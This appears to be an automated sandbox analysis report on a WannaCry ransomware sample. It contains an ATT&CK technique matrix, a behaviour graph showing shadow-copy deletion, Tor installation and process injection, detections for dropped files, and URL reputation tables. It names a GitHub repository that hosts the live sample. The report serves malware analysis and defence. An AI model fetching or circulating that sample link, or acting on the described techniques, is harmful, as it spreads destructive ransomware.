              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\~SDAD7E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SD3838.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\~SDAD6D.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SD384B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\~SD385D.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\~SD3875.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\~SD3886.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SD385E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SD381D.tmpJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information12
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              12
              Scripting
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              111
              Process Injection
              1
              File Deletion
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Browser Session Hijacking
              1
              Encrypted Channel
              Exfiltration Over Bluetooth1
              Inhibit System Recovery
              Email AddressesDNS ServerDomain AccountsAt1
              Browser Extensions
              11
              Registry Run Keys / Startup Folder
              11
              Masquerading
              Security Account Manager111
              Security Software Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              2
              Multi-hop Proxy
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron11
              Registry Run Keys / Startup Folder
              1
              Services File Permissions Weakness
              1
              Modify Registry
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Services File Permissions Weakness
              Network Logon Script21
              Virtualization/Sandbox Evasion
              LSA Secrets21
              Virtualization/Sandbox Evasion
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input Capture2
              Proxy
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Hidden Files and Directories
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Services File Permissions Weakness
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Rundll32
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1414487 URL: https://github.com/chronosm... Startdate: 23/03/2024 Architecture: WINDOWS Score: 100 98 Malicious sample detected (through community Yara rule) 2->98 100 Antivirus detection for dropped file 2->100 102 Multi AV Scanner detection for dropped file 2->102 104 10 other signatures 2->104 9 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 1 1001 2->9         started        13 chrome.exe 20 2->13         started        16 rundll32.exe 2->16         started        process3 dnsIp4 70 C:\Users\user\Downloads\@WanaDecryptor@.exe, PE32 9->70 dropped 72 C:\Users\user\Documents\...FOYFBOLXA.xlsx, COM 9->72 dropped 74 C:\Users\user\Documents\@WanaDecryptor@.exe, PE32 9->74 dropped 78 248 other malicious files 9->78 dropped 128 Creates files in the recycle bin to hide itself 9->128 130 Drops PE files to the document folder of the user 9->130 132 Found Tor onion address 9->132 134 6 other signatures 9->134 18 @WanaDecryptor@.exe 9->18         started        23 cmd.exe 9->23         started        25 cmd.exe 9->25         started        29 184 other processes 9->29 88 192.168.2.16, 443, 49700, 49701 unknown unknown 13->88 90 239.255.255.250 unknown Reserved 13->90 76 C:\Users\...\Ransomware.WannaCry.zip (copy), Zip 13->76 dropped 27 chrome.exe 13->27         started        file5 signatures6 process7 dnsIp8 80 127.0.0.1 unknown unknown 18->80 60 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 18->60 dropped 62 C:\Users\user\AppData\Local\Temp\...\tor.exe, PE32 18->62 dropped 64 C:\Users\user\AppData\Local\...\taskhsvc.exe, PE32 18->64 dropped 68 7 other malicious files 18->68 dropped 106 Multi AV Scanner detection for dropped file 18->106 108 Installs TOR (Internet Anonymizer) 18->108 110 Deletes shadow drive data (may be related to ransomware) 18->110 118 2 other signatures 18->118 31 taskhsvc.exe 18->31         started        66 C:\Users\user\AppData\Local\Temp\...\m.vbs, ASCII 23->66 dropped 112 Command shell drops VBS files 23->112 114 Uses cmd line tools excessively to alter registry or file data 23->114 34 conhost.exe 23->34         started        36 cscript.exe 23->36         started        38 @WanaDecryptor@.exe 25->38         started        41 conhost.exe 25->41         started        82 www.google.com 142.251.32.100, 443, 49767 GOOGLEUS United States 27->82 84 140.82.113.4, 443, 49741, 49799 GITHUBUS United States 27->84 86 12 other IPs or domains 27->86 116 Writes to foreign memory regions 29->116 43 svchost.exe 29->43 injected 45 conhost.exe 29->45         started        47 conhost.exe 29->47         started        49 2 other processes 29->49 file9 signatures10 process11 dnsIp12 92 193.11.114.45 SUNETSUNETSwedishUniversityNetworkEU Sweden 31->92 94 128.31.0.39 MIT-GATEWAYSUS United States 31->94 96 2 other IPs or domains 31->96 51 conhost.exe 31->51         started        122 Found Tor onion address 38->122 124 Deletes shadow drive data (may be related to ransomware) 38->124 53 cmd.exe 38->53         started        126 Uses bcdedit to modify the Windows boot settings 43->126 signatures13 process14 signatures15 120 Deletes shadow drive data (may be related to ransomware) 53->120 56 conhost.exe 53->56         started        58 WMIC.exe 53->58         started        process16

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip0%Avira URL Cloudsafe
              https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk100%AviraLNK/Runner.VPDJ
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libeay32.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent-2-0-5.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent_core-2-0-5.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent_extra-2-0-5.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libgcc_s_sjlj-1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libssp-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\ssleay32.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\zlib1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe89%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe87%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry96%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Documents\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Downloads\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_0%URL Reputationsafe
              https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parse0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_j0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu0%URL Reputationsafe
              https://github.githubassets.com/favicons/favicon.png0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-0%URL Reputationsafe
              https://www.githubstatus.com/0%URL Reputationsafe
              https://github.githubassets.com/assets/codespaces-1a8626dd714a.js0%Avira URL Cloudsafe
              https://user-images.githubusercontent.com/0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/light_tritanopia-5cb699a7e247.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/react-code-view.959fb0b61e6a1de773e7.module.css0%Avira URL Cloudsafe
              https://github.githubassets.com/favicons/favicon.svg0%URL Reputationsafe
              https://github.githubassets.com0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-0%URL Reputationsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-01764c79fa41.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da-c300384a527b.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c90%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa-075cdbe1c5e3.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da-c300384a527b.js0%VirustotalBrowse
              https://github.githubassets.com/assets/light_tritanopia-5cb699a7e247.css0%VirustotalBrowse
              https://github.githubassets.com/assets/repository-6247ca238fd4.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/react-code-view.959fb0b61e6a1de773e7.module.css0%VirustotalBrowse
              https://github.githubassets.com/assets/codespaces-1a8626dd714a.js0%VirustotalBrowse
              https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c90%VirustotalBrowse
              https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.js0%Avira URL Cloudsafe
              https://user-images.githubusercontent.com/0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6-949a0431d8c0.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-ch0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/dark-a167e256da9c.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-ch0%VirustotalBrowse
              https://github.githubassets.com/assets/dark-a167e256da9c.css0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js-4d087b8e0c8a.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.js0%VirustotalBrowse
              https://github.githubassets.com/assets/repository-6247ca238fd4.css0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8ab472e2f924.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js-4d087b8e0c8a.js0%VirustotalBrowse
              https://github.githubassets.com/assets/ui_packages_paths_index_ts-ea3e1b2a33c6.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.js0%VirustotalBrowse
              https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-01764c79fa41.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-11f6759e1cef.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/behaviors-4e25e265ef84.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-11f6759e1cef.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8ab472e2f924.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/behaviors-4e25e265ef84.js0%VirustotalBrowse
              https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js0%VirustotalBrowse
              https://github.githubassets.com/assets/primer-f3607eccaaae.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/ui_packages_paths_index_ts-ea3e1b2a33c6.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-f17f2abffb7f.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js-5a4a31c01bca.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/primer-f3607eccaaae.css0%VirustotalBrowse
              https://github.githubassets.com/assets/primer-primitives-366b5c973fad.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js0%VirustotalBrowse
              https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a0%Avira URL Cloudsafe
              https://avatars.githubusercontent.com/u/19915931?v=4&size=400%Avira URL Cloudsafe
              https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-244ee9d9ed77.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-f17f2abffb7f.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-no0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b-d1813ba335d8.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js-5a4a31c01bca.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_j0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayo0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-no0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-244ee9d9ed77.js0%VirustotalBrowse
              https://github.githubassets.com/assets/primer-primitives-366b5c973fad.css0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_j0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b-d1813ba335d8.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.js0%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341-b93616e2fc14.js0%Avira URL Cloudsafe
              http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/light_colorblind-af6c685139ba.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/light-0eace2597ca3.css0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a1%VirustotalBrowse
              https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-68b3d6c8feb2.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/wp-runtime-5afb085e74be.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6-fd8396d2490b.js0%Avira URL Cloudsafe
              https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayo0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              52.216.245.236
              truefalse
                high
                avatars.githubusercontent.com
                185.199.109.133
                truefalse
                  unknown
                  github.com
                  140.82.114.4
                  truefalse
                    high
                    raw.githubusercontent.com
                    185.199.108.133
                    truefalse
                      unknown
                      api.github.com
                      140.82.113.6
                      truefalse
                        high
                        www.google.com
                        142.251.32.100
                        truefalse
                          high
                          user-images.githubusercontent.com
                          185.199.111.133
                          truefalse
                            unknown
                            glb-db52c2cf8be544.github.com
                            140.82.114.21
                            truefalse
                              high
                              github.githubassets.com
                              185.199.109.154
                              truefalse
                                unknown
                                collector.github.com
                                unknown
                                unknownfalse
                                  high
                                  github-cloud.s3.amazonaws.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://github.githubassets.com/assets/codespaces-1a8626dd714a.jsfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.githubassets.com/assets/react-code-view.959fb0b61e6a1de773e7.module.cssfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-01764c79fa41.jsfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.jsfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da-c300384a527b.jsfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.jsfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.github.com/_private/browser/statsfalse
                                      high
                                      https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/tree-commit-info/masterfalse
                                        high
                                        https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/branch-countfalse
                                          high
                                          https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa-075cdbe1c5e3.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/repository-6247ca238fd4.cssfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/element-registry-fb4b8d40f206.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6-949a0431d8c0.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/dark-a167e256da9c.cssfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js-4d087b8e0c8a.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8ab472e2f924.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.githubassets.com/assets/ui_packages_paths_index_ts-ea3e1b2a33c6.jsfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/used_by_listfalse
                                            high
                                            https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.jsfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-11f6759e1cef.jsfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.githubassets.com/assets/behaviors-4e25e265ef84.jsfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.jsfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.githubassets.com/assets/primer-f3607eccaaae.cssfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.jsfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-f17f2abffb7f.jsfalse
                                            • 0%, Virustotal, Browse
